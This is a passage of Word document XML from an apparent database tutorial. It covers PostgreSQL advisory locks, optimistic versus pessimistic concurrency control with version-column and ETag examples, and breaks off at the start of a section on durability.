    <w:p w14:paraId="5FF39469" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SELECT pg_advisory_lock(user_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E915D48" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- ... do work ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B46487" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SELECT pg_advisory_unlock(user_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288172ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922A673" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Non-blocking try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11582DAC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  SELECT pg_try_advisory_lock(user_id);  -- returns boolean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDCD32E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- false = someone else holds it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E98A6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77530BC4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Transaction-scoped (auto-released at end of transaction):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F75AF5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SELECT pg_advisory_xact_lock(user_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77695379" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB44D6F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Use: coarse-grained coordination (mutex for business operations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060B5433" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Application-level serialization without row-level locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9D6D4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA38CF6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Danger: if advisory_lock not released (crash), it stays until session ends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46637C47" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Use transaction-scoped advisory locks to auto-release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A3917F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Optimistic vs Pessimistic Concurrency Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11AFF2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6097A5A9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Pessimistic concurrency control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB40ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Assume: conflicts are likely → acquire locks before reading/writing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB69998" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Mechanism: SELECT FOR UPDATE before read-modify-write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2F195D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FECC0A7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Pros: no retry logic needed (conflicts prevented, not detected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7A586" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Cons: locks held for entire transaction → blocking → lower throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286043C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D43B1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FACB98" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    High contention (many concurrent modifications to same rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E616E72" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Long transactions where retrying would be expensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD6D84B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    When blocking is preferable to aborting work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3476A8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="7AB8FAD2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Optimistic concurrency control (OCC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B4ACB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Assume: conflicts are rare → proceed without locks, check for conflicts at commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F11502" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Mechanism: version numbers or ETags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF973E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19CAC4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Version column approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51847F3E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    CREATE TABLE products (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631256A5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      id BIGSERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192F213" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      name TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D9F98" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      price DECIMAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC031C8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      version INTEGER DEFAULT 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77429BE5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163A304" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7671AFFC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    -- Read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02794718" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    SELECT id, name, price, version FROM products WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9109B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    -- Returns: {id:1, name:"Widget", price:10.00, version:5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEEB638" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D15DC0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    -- Modify (application changes price to 12.00):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50066C8F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    UPDATE products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F93AD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    SET price = 12.00, version = version + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365112A3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    WHERE id = 1 AND version = 5;  -- conditional on expected version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F44D94B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F510988" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    -- Check rows updated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E786D8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    IF rows_affected == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572CB740" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      -- Conflict: someone else modified between our read and write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697F0796" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      -- version is no longer 5 → our update was rejected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952F091" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      RAISE 'Conflict: product was modified, retry'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE3B3CF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    ELSE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375CA76" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      -- Success: we won the race, version is now 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E50EE6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679551C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2FEEC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  OCC with timestamp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA5EDA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Use updated_at TIMESTAMPTZ as version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5B719" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE151E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    UPDATE products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD1455" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    SET price = 12.00, updated_at = NOW()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25620B6C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    WHERE id = 1 AND updated_at = '2024-01-15 10:30:00';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D0287" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436DC25" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    (Same pattern: conditional update fails if row changed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A84EE2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE70CF7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  REST API with ETags (OCC for HTTP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E949E8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    GET /products/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C50B84" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → ETag: "v5" (version 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257B6AD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A07B7A7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    PUT /products/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151D7357" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    If-Match: "v5"  ← conditional on version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE89C7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Body: {price: 12.00}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65586178" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA0320E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → 200 OK: update succeeded (version matched)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD076C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → 412 Precondition Failed: version mismatch (someone else modified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0286E4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD8555" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Pros: no locks → maximum concurrency for non-conflicting workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF10A0A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Cons: retry logic required (transaction must be idempotent, restartable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501AD45C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        under high contention: many retries → high CPU, poor throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3051A623" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F68F4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A231F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Low contention (conflicts are genuinely rare)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613224DE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Short transactions (cheap to retry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD32DC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Read-heavy workloads with occasional writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04551670" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Distributed systems without distributed locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4A8B79" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:pict w14:anchorId="7E7F1AE2">
          <v:rect id="_x0000_i6773" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D5710D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Durability — The Persistence Guarantee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5F0699" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Durability Really Means</w:t>
      </w:r>
    </w:p>
